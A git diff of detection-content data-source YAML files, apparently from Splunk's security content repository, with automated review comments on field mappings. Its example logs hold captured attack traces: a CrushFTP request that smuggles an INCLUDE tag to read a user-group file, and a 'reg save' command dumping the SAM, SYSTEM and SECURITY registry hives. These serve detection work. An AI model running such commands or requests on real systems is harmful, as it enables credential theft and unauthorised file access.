+ ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
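Review bot: The `field_mappings` block maps `ImageFileName` to `Processes.process_path`, but the example_log shows that field as an NT device path (`\Device\HarddiskVolume1\Windows\...`) rather than a drive-letter path, and no field is mapped to `Processes.process_name`; a detection written against `C:\Windows\...` or against `process_name` will not match this source as mapped. I would document that above the mapping, e.g. `# ImageFileName is an NT device path (\Device\HarddiskVolumeN\...), not C:\...; process_name is TA-derived`, so authors converting a Sysmon search to this source know to adjust path matching. The `supported_TA` sequence also appears to be written flush (`- name:`) while `field_mappings` is indented (`  - data_model:`); if that is not an artifact of the diff rendering, pick one sequence indentation for the file. The example_log single-quoted scalar is wrapped across lines, which YAML folds with single spaces; that happens to round-trip here, but re-wrapping inside the JSON string values is fragile for future edits.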
diff --git a/data_sources/crushftp.yml b/data_sources/crushftp.yml
new file mode 100644
index 0000000000..e868f787d8
--- /dev/null
+++ b/data_sources/crushftp.yml
@@ -0,0 +1,16 @@
+name: CrushFTP
+id: 8a42ace5-e4c8-4653-80cf-1b8e7e6024ef
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for CrushFTP
+source: crushftp
+sourcetype: crushftp:sessionlogs
+supported_TA:
+- {}
+fields:
+- _time
+- _raw
+example_log: 'SESSION|05/14/2024 17:36:21.859|[HTTPS:169_52326_sMa:anonymous:10.0.1.30]
+ READ: *POST /WebInterface/function/?c2f=CmF1&command=zip&path=%3CINCLUDE%3Eusers/MainUsers/groups.XML%3C/INCLUDE%3E&names=/a
+ HTTP/1.1*'
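Review bot: `supported_TA` is given as a list holding a single empty mapping (`- {}`), which carries no information and does not match the shape used by the sibling new file `data_sources/crowdstrike_processrollup2.yml`, where each entry has `name`, `url` and `version`. If no add-on is known for this sourcetype, `supported_TA: []` states that explicitly; if one exists, fill in the entry. Since `fields` lists only `_time` and `_raw`, any detection on this source will parse `_raw` itself, which is worth a comment such as `# no field extractions known; searches must parse _raw` so that is not mistaken for an incomplete field list.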
diff --git a/data_sources/endpoint/CrowdStrike.yml b/data_sources/endpoint/CrowdStrike.yml
deleted file mode 100644
index ed765aee8b..0000000000
--- a/data_sources/endpoint/CrowdStrike.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: CrowdStrike
-id: 1064b9f3-82cd-4e4f-ac1e-322ec54569a7
-author: Patrick Bareiss, Splunk
-source: crowdstrike
-sourcetype: crowdstrike:events:sensor
-separator: event_simpleName
-supported_TA:
- name: CrowdStrike Falcon Event Streams Technical Add-On
- version: 3.2.1
- url: https://splunkbase.splunk.com/app/5082
-event_names:
-- event_name: Crowdstrike ProcessRollup2
- data_source: data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
\ No newline at end of file
diff --git a/data_sources/endpoint/Sysmon_EventID.yml b/data_sources/endpoint/Sysmon_EventID.yml
deleted file mode 100644
index fe21185eeb..0000000000
--- a/data_sources/endpoint/Sysmon_EventID.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-name: Sysmon EventID
-id: 848aec1b-90aa-48a9-ae52-31d3a2e79697
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
-sourcetype: xmlwineventlog
-separator: EventID
-configuration: https://github.com/SwiftOnSecurity/sysmon-config
-supported_TA:
- name: Splunk Add-on for Sysmon
- version: 4.0.0
- url: https://splunkbase.splunk.com/app/5709/
-event_names:
-- event_name: Sysmon EventID 1
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
-- event_name: Sysmon EventID 10
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
-- event_name: Sysmon EventID 11
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
-- event_name: Sysmon EventID 12
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
-- event_name: Sysmon EventID 13
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
-- event_name: Sysmon EventID 14
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_14.yml
-- event_name: Sysmon EventID 15
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
-- event_name: Sysmon EventID 17
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
-- event_name: Sysmon EventID 18
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
-- event_name: Sysmon EventID 20
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
-- event_name: Sysmon EventID 21
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
-- event_name: Sysmon EventID 22
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
-- event_name: Sysmon EventID 23
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
-- event_name: Sysmon EventID 3
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
-- event_name: Sysmon EventID 5
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
-- event_name: Sysmon EventID 6
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
-- event_name: Sysmon EventID 7
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
-- event_name: Sysmon EventID 8
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
-- event_name: Sysmon EventID 9
- data_source: data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
diff --git a/data_sources/endpoint/Sysmon_for_Linux_EventID.yml b/data_sources/endpoint/Sysmon_for_Linux_EventID.yml
deleted file mode 100644
index 096a4002b5..0000000000
--- a/data_sources/endpoint/Sysmon_for_Linux_EventID.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Sysmon for Linux EventID
-id: da9fc0c9-4b15-4537-aa91-19ca0cb1eba5
-author: Patrick Bareiss, Splunk
-source: Syslog:Linux-Sysmon/Operational
-sourcetype: sysmon:linux
-separator: EventID
-supported_TA:
- name: Splunk Add-on for Sysmon for Linux
- version: 1.0.0
- url: https://splunkbase.splunk.com/app/6652
-event_names:
-- event_name: Sysmon for Linux EventID 1
- data_source: data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
-- event_name: Sysmon for Linux EventID 11
- data_source: data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Application.yml b/data_sources/endpoint/Windows_Event_Log_Application.yml
deleted file mode 100644
index a8e99dbb1f..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Application.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log Application
-id: fc387a6f-0706-49d4-b97f-739144767075
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Application
-sourcetype: XmlWinEventLog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Application 2282
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
-- event_name: Windows Event Log Application 3000
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_CAPI2.yml b/data_sources/endpoint/Windows_Event_Log_CAPI2.yml
deleted file mode 100644
index e244f1e622..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_CAPI2.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log CAPI2
-id: b77e7a42-6bde-4ff5-971f-5115a8747b66
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log CAPI2 70
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
-- event_name: Windows Event Log CAPI2 81
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml b/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml
deleted file mode 100644
index 6c17ebb697..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Windows Event Log CertificateServicesClient
-id: dc953ea6-b9f0-4bb6-8f33-6f0c918cdfd2
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
-sourcetype: XmlWinEventLog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log CertificateServicesClient 1007
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Defender.yml b/data_sources/endpoint/Windows_Event_Log_Defender.yml
deleted file mode 100644
index 8af7021fe6..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Defender.yml
+++ /dev/null
@@ -1,31 +0,0 @@
-name: Windows Event Log Defender
-id: 4bae37e2-b347-4d76-b05d-f97066a8aa88
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Defender 1121
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
-- event_name: Windows Event Log Defender 1122
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
-- event_name: Windows Event Log Defender 1125
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1125.yml
-- event_name: Windows Event Log Defender 1126
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1126.yml
-- event_name: Windows Event Log Defender 1129
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
-- event_name: Windows Event Log Defender 1131
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1131.yml
-- event_name: Windows Event Log Defender 1132
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1132.yml
-- event_name: Windows Event Log Defender 1133
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1133.yml
-- event_name: Windows Event Log Defender 1134
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1134.yml
-- event_name: Windows Event Log Defender 5007
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Printservice.yml b/data_sources/endpoint/Windows_Event_Log_Printservice.yml
deleted file mode 100644
index c9eb336f3a..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Printservice.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Windows Event Log Printservice
-id: ba8f90f0-2028-44b5-853a-18f63ebd25e4
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-PrintService/Admin
-sourcetype: WinEventLog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Printservice 316
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
-- event_name: Windows Event Log Printservice 4909
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_4909.yml
-- event_name: Windows Event Log Printservice 808
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml b/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml
deleted file mode 100644
index 016868c6e0..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Windows Event Log RemoteConnectionManager
-id: 7f0df187-53bc-4a6f-ada9-0ea3026b9d3b
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
-sourcetype: wineventlog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log RemoteConnectionManager 1149
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Security.yml b/data_sources/endpoint/Windows_Event_Log_Security.yml
deleted file mode 100644
index ca5c7355c4..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Security.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-name: Windows Event Log Security
-id: e3e44de1-57b1-462d-b57c-c7657af7ae6e
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Security
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Security 1100
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
-- event_name: Windows Event Log Security 1102
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
-- event_name: Windows Event Log Security 4624
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
-- event_name: Windows Event Log Security 4625
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
-- event_name: Windows Event Log Security 4627
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
-- event_name: Windows Event Log Security 4648
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
-- event_name: Windows Event Log Security 4662
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
-- event_name: Windows Event Log Security 4663
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
-- event_name: Windows Event Log Security 4672
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
-- event_name: Windows Event Log Security 4688
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
-- event_name: Windows Event Log Security 4698
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
-- event_name: Windows Event Log Security 4699
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
-- event_name: Windows Event Log Security 4703
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
-- event_name: Windows Event Log Security 4719
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
-- event_name: Windows Event Log Security 4720
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
-- event_name: Windows Event Log Security 4724
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
-- event_name: Windows Event Log Security 4725
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
-- event_name: Windows Event Log Security 4726
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
-- event_name: Windows Event Log Security 4728
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4728.yml
-- event_name: Windows Event Log Security 4732
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
-- event_name: Windows Event Log Security 4738
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
-- event_name: Windows Event Log Security 4739
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
-- event_name: Windows Event Log Security 4741
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
-- event_name: Windows Event Log Security 4742
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
-- event_name: Windows Event Log Security 4768
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
-- event_name: Windows Event Log Security 4769
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
-- event_name: Windows Event Log Security 4771
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
-- event_name: Windows Event Log Security 4776
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
-- event_name: Windows Event Log Security 4781
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
-- event_name: Windows Event Log Security 4794
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
-- event_name: Windows Event Log Security 4798
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
-- event_name: Windows Event Log Security 4876
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
-- event_name: Windows Event Log Security 4886
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
-- event_name: Windows Event Log Security 4887
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
-- event_name: Windows Event Log Security 5136
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
-- event_name: Windows Event Log Security 5137
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
-- event_name: Windows Event Log Security 5140
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
-- event_name: Windows Event Log Security 5141
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
-- event_name: Windows Event Log Security 5145
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_System.yml b/data_sources/endpoint/Windows_Event_Log_System.yml
deleted file mode 100644
index 65daacfa51..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_System.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: Windows Event Log System
-id: 5f303f66-1947-49b8-8b26-f61c8de11cc3
-author: Patrick Bareiss, Splunk
-source: WinEventLog:System
-sourcetype: WinEventLog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log System 104
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_104.yml
-- event_name: Windows Event Log System 4720
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
-- event_name: Windows Event Log System 4726
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
-- event_name: Windows Event Log System 7036
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
-- event_name: Windows Event Log System 7040
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
-- event_name: Windows Event Log System 7045
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml b/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml
deleted file mode 100644
index 4d86b7675a..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log TaskScheduler
-id: 1f422461-5810-445d-a304-223b26841267
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-TaskScheduler/Operational
-sourcetype: wineventlog
-separator: EventCode
-supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
- url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log TaskScheduler 200
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
-- event_name: Windows Event Log TaskScheduler 201
- data_source: data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_201.yml
diff --git a/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml b/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
deleted file mode 100644
index 93b21e1b10..0000000000
--- a/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: Crowdstrike ProcessRollup2
-fields:
- - AuthenticationId
- - AuthenticationId_meaning
- - AuthenticodeHashData
- - CommandLine
- - ConfigBuild
- - ConfigStateHash
- - EffectiveTransmissionClass
- - Entitlements
- - EventOrigin
- - ImageFileName
- - ImageSubsystem
- - ImageSubsystem_meaning
- - IntegrityLevel
- - IntegrityLevel_meaning
- - MD5HashData
- - ParentAuthenticationId
- - ParentBaseFileName
- - ParentProcessId
- - ProcessCreateFlags
- - ProcessEndTime
- - ProcessParameterFlags
- - ProcessParameterFlags_meaning
- - ProcessStartTime
- - ProcessSxsFlags
- - ProcessSxsFlags_meaning
- - RawProcessId
- - SHA1HashData
- - SHA256HashData
- - SessionId
- - SignInfoFlags
- - SignInfoFlags_meaning
- - SourceProcessId
- - SourceThreadId
- - Tags
- - TargetProcessId
- - TokenType
- - TokenType_meaning
- - UserSid
- - WindowFlags
- - WindowFlags_meaning
- - action
- - aid
- - aid_city
- - aid_computer_name
- - aid_continent
- - aid_country
- - aid_machine_domain
- - aid_os_version
- - aid_ou
- - aid_site_name
- - aid_system_product_name
- - aip
- - cid
- - dest
- - event_ingest_time
- - event_platform
- - event_simpleName
- - eventtype
- - host_res_aid
- - id
- - os
- - parent_process_exec
- - parent_process_id
- - parent_process_name
- - process
- - process_exec
- - process_hash
- - process_id
- - process_integrity_level
- - process_name
- - process_path
- - resolve_dest
- - resolve_process_integrity_level
- - tag
- - timestamp
- - user
- - user_id
- - vendor_product
-field_mappings:
- - data_model: cim
- data_set: Endpoint.Processes
- mapping:
- CommandLine: Processes.process
- ImageFileName: Processes.process_path
- ParentBaseFileName: Processes.parent_process_name
- ParentProcessId: Processes.parent_process_id
- RawProcessId: Processes.process_id
- SHA256HashData: Processes.process_hash
- UserSid: Processes.user
-example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
deleted file mode 100644
index f0cc4704cf..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
+++ /dev/null
@@ -1,140 +0,0 @@
-event_name: Sysmon EventID 1
-fields:
- - _time
- - Channel
- - CommandLine
- - Company
- - Computer
- - CurrentDirectory
- - Description
- - EventChannel
- - EventCode
- - EventData_Xml
- - EventDescription
- - EventID
- - EventRecordID
- - FileVersion
- - Guid
- - Hashes
- - IMPHASH
- - Image
- - IntegrityLevel
- - Keywords
- - Level
- - LogonGuid
- - LogonId
- - MD5
- - Name
- - Opcode
- - OriginalFileName
- - ParentCommandLine
- - ParentImage
- - ParentProcessGuid
- - ParentProcessId
- - ProcessGuid
- - ProcessID
- - ProcessId
- - Product
- - RecordID
- - RecordNumber
- - RuleName
- - SHA256
- - SecurityID
- - SystemTime
- - System_Props_Xml
- - Task
- - TerminalSessionId
- - ThreadID
- - TimeCreated
- - User
- - UserID
- - UtcTime
- - Version
- - action
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - dvc_nt_host
- - event_id
- - eventtype
- - host
- - id
- - index
- - linecount
- - original_file_name
- - os
- - parent_process
- - parent_process_exec
- - parent_process_guid
- - parent_process_id
- - parent_process_name
- - parent_process_path
- - process
- - process_current_directory
- - process_exec
- - process_guid
- - process_hash
- - process_id
- - process_integrity_level
- - process_name
- - process_path
- - punct
- - signature
- - signature_id
- - source
- - sourcetype
- - splunk_server
- - tag
- - tag::eventtype
- - timeendpos
- - timestartpos
- - user
- - user_id
- - vendor_product
-field_mappings:
- - data_model: cim
- data_set: Endpoint.Processes
- mapping:
- ProcessGuid: Processes.process_guid
- ProcessId: Processes.process_id
- Image: Processes.process_path
- Image|endswith: Processes.process_name
- CommandLine: Processes.process
- CurrentDirectory: Processes.process_current_directory
- User: Processes.user
- IntegrityLevel: Processes.process_integrity_level
- Hashes: Processes.process_hash
- ParentProcessGuid: Processes.parent_process_guid
- ParentProcessId: Processes.parent_process_id
- ParentImage: Processes.parent_process_name
- ParentCommandLine: Processes.parent_process
- Computer: Processes.dest
- OriginalFileName: Processes.original_file_name
-convert_to_log_source:
- - data_source: Windows Event Log Security 4688
- mapping:
- ProcessId: NewProcessId
- Image: NewProcessName
- Image|endswith: NewProcessName|endswith
- CommandLine: Process_Command_Line
- User: SubjectUserSid
- ParentProcessId: ProcessId
- ParentImage: ParentProcessName
- ParentImage|endswith: ParentProcessName|endswith
- Computer: Computer
- OriginalFileName: NewProcessName|endswith
- - data_source: Crowdstrike Process
- mapping:
- ProcessId: RawProcessId
- Image: ImageFileName
- CommandLine: CommandLine
- User: UserSid
- ParentProcessId: ParentProcessId
- ParentImage: ParentBaseFileName
-example_log: "154100x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-6764986.attackrange.local-2020-10-08 11:03:46.615{96128EA2-F212-5F7E-E400-000000007F01}2296C:\\Windows\\System32\\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft\xAE Windows\xAE Operating SystemMicrosoft CorporationCmd.Exe\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam %%temp%%\\sam & reg save HKLM\\system %%temp%%\\system & reg save HKLM\\security %%temp%%\\security\" C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\ATTACKRANGE\\Administrator{96128EA2-F210-5F7E-ACD4-080000000000}0x8d4ac0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{96128EA2-F211-5F7E-DF00-000000007F01}4624C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"powershell.exe\" -noninteractive -encodedcommand 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"
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
deleted file mode 100644
index 7261f3945e..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: Sysmon EventID 10
-fields:
-- _time
-- CallTrace
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- GrantedAccess
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceImage
-- SourceProcessGUID
-- SourceProcessId
-- SourceThreadId
-- SystemTime
-- System_Props_Xml
-- TargetImage
-- TargetProcessGUID
-- TargetProcessId
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- granted_access
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
